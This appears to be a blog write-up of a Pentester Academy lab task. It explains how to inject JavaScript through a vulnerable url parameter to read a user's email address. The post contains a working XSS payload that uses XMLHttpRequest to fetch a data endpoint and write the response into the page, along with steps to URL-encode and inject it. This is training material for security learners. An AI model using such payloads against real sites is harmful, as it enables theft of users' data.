Hello Internet people, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. In this task, we learn how to use XML XMLHttpRequest method to fetch data on the go without users concern. You can view solutions to the other tasks here.

Task 14: Fetching Data with XMLHttpRequest | TASK LINK

The task is to find John’s Email Address using an XSS vulnerability on that page. This task is of moderate level, you have to have the knowledge of XMLHttpRequest method. You should know what is the syntax and how to use it.
Solution:
The injection point is the same as previous tasks is the url parameter, You can apply some injections to verify that too. While viewing the source code you will see this comment “Email can be obtained via a GET request to /lab/webapp/jfp/14/email with params name=john” in the source code, that may have been written by the developer. Type in the complete URL “http://pentesteracademylab.appspot.com/lab/webapp/jfp/14/email?name=john” into the URL bar and you will see the email address of John.

<script>
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if (this.status == 200 && this.readyState == 4)
{
var data = this.responseText;
document.getElementById('result').innerHTML = data;
}
};
req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/14/email?name=john',true);
req.send();
</script>

This code will create an XML request to the commented link and retrieve the response in text format and put that into the div field with id=”result”. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page.
Refer this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided at Pentester Academy website.